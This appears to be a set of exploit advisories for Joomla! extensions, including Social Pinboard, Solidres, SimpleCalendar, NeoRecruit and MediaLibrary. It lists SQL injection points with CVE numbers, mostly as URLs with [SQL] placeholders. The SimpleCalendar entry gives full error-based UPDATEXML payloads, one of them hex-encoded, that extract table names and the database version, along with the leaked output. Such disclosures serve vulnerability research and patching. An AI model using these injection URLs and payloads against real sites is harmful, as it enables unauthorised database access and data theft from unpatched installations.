Joomla! Pinterest Clone Social Pinboard 2.0 SQL Injection

Joomla! Pinterest Clone Social Pinboard 2.0 SQL Injection
Posted Feb 17, 2018
Authored by Ihsan Sencan

Joomla! Pinterest Clone Social Pinboard version 2.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
advisories | CVE-2018-5987
MD5 | e15582754c3dfe6ef231fd4200178945
# # # # 
# Exploit Title: Joomla! Pinterest Clone Social Pinboard 2.0 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: https://www.apptha.com/
# Software Link: https://www.apptha.com/joomla/social-pinboard-script
# Version: 2.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5987
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_socialpinboard&view=ajaxcontrol&tmpl=component&task=getlikeinfo&pin_id=[SQL]&user_id=[SQL]
#
# 2)
# http://localhost/[PATH]/index.php?option=com_socialpinboard&view=gift&starts=100&ends=[SQL]
#
# 3)
# http://localhost/[PATH]/index.php?option=com_socialpinboard&view=home&category=[SQL]
#
# 4)
# http://localhost/[PATH]/index.php?option=com_socialpinboard&view=pindisplay&uid=[SQL]
#
# 5)
# http://localhost/[PATH]/index.php?option=com_socialpinboard&view=search&serachVal=[SQL]
#
# 6)
# http://localhost/[PATH]/index.php?option=com_socialpinboard&view=likes&uid=[SQL]
#
# # # #

Joomla! Timetable Responsive Schedule For Joomla 1.5 SQL Injection

# # # #
# Exploit Title: Joomla! Component Timetable Responsive Schedule For Joomla 1.5 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://quanticalabs.com/joomla/
# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/timetable-responsive-schedule-for-joomla/
# Version: 1.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6583
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_timetable&view=event&alias=[SQL]
#
# # # #

Joomla! Staff Master 1.0 RC 1 SQL Injection

# # # #
# Exploit Title: Joomla! Component Staff Master <= 1.0 RC 1 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://www.systemsunited.net/
# Software Link: http://www.systemsunited.net/
# Version: <= 1.0 RC 1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5992
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_staffmaster&view=staff&name=[SQL]
#
# 2)
# http://localhost/[PATH]/index.php?option=com_staffmaster&view=staff&name=[SQL]
#
# # # #

Joomla! Solidres 2.5.1 SQL Injection

Joomla! Solidres 2.5.1 SQL Injection
Posted Feb 17, 2018
Authored by Ihsan Sencan

Joomla! Solidres component version 2.5.1 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
advisories | CVE-2018-5980
MD5 | 7ba02386bcc4a475c3adccf426cc7033
# # # # 
# Exploit Title: Joomla! Component Solidres 2.5.1 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://solidres.com/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/solidres/
# Version: 2.5.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5980
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php/en/component/solidres/?location=&checkin=2018-01-08&checkout=2018-01-09&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=0&option=com_solidres&task=hub.search&start=0&Itemid=306&9f3d70a896d5f1332174599ecac43607=1&ordering=score&direction=desc[SQL]&type_id=12
#
# http://localhost/[PATH]/index.php/en/component/solidres/?checkin=2018-01-08&checkout=2018-01-09&option=com_solidres&task=hub.search&direction=desc[SQL]
#
# # # #

Joomla! Smart Shoutbox 3.0.0 SQL Injection

# # # # 
# Exploit Title: Joomla! Component Smart Shoutbox 3.0.0 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: https://thekrotek.com/
# Software Link: https://extensions.joomla.org/extension/smart-shoutbox/
# Version: 3.0.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5975
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/component/smartshoutbox/archive?shoutauthor=[SQL]
#
# # # #

Joomla! SimpleCalendar 3.1.9 SQL Injection

# # # #
# Exploit Title: Joomla! Component SimpleCalendar 3.1.9 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://albonico.ch/
# Software Link: http://software.albonico.ch/downloads/file/3-simplecalendar-3-1-9.html
# Version: 3.1.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5974
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[0]=[SQL]
#
#
# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=[SQL]
#
#
# # # #

http://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=(/*!02225UPDATEXML*/(66,CONCAT(0x3a,(/*!02225SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3a)+FROM+INFORMATION_SCHEMA.TABLES+/*!02225WHERE*/+TABLE_SCHEMA=DATABASE()),(ELT(1=1,1))),1))

http://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[0]=%28%55%50%44%41%54%45%58%4d%4c%28%30%2c%2f%2a%21%30%31%31%31%31%43%4f%4e%43%41%54%2a%2f%280x2e%2c%76%65%72%73%69%6f%6e%28%29%2c0x7e7e7e7e%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%2c2925%29%29
XPATH syntax error: '10.1.21-MariaDB~~~~1joomla375' XPATH syntax error: '10.1.21-MariaDB~~~~1joomla375'

Joomla! Realpin 1.5.04 SQL Injection

# # # #
# Exploit Title: Joomla! Component Realpin <= 1.5.04 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://realpin.frumania.com/
# Software Link: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-display/realpin/
# Software Download: http://realpin.frumania.com/downloads/com_realpin_j3.1_1.5.04.zip
# Version: <= 1.5.04
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6005
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_realpin&pinboard=[SQL]
#
# # # #

Joomla! Project Log 1.5.3 SQL Injection

# # # #
# Exploit Title: Joomla! Component Project Log 1.5.3 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: https://extensions.thethinkery.net/
# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/project-a-task-management/project-log/
# Version: 1.5.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6024
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_projectlog&view=cat&search=[SQL]
#
#
# # # #

Joomla! NeoRecruit 4.1 SQL Injection

# # # #
# Exploit Title: Joomla! Component NeoRecruit 4.1 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://neojoomla.com/
# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/jobs-a-recruitment/neorecruit/
# Version: 4.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6370
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/neorecruit/all-offers/xxx[SQL].html
# http://localhost/[PATH]/neorecruit/xxx/xxx[SQL]
#
# # # #

Joomla! MediaLibrary Free 4.0.12 SQL Injection

# # # # 
# Exploit Title: Joomla! Component MediaLibrary Free 4.0.12 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://ordasoft.com/
# Software Link: https://extensions.joomla.org/extensions/extension/living/education-a-culture/medialibrary-basic/
# Software Download: http://ordasoft.com/All-Download/Download-document/173-Media-Library-basic-2.1.html
# Version: 4.0.12
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5971
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_medialibrary&task=view_author&id=[SQL]
#
# 2)
# http://localhost/[PATH]/index.php/component/medialibrary/0/lend_request?Itemid=0&mid[0]=[SQL]
#
# # # #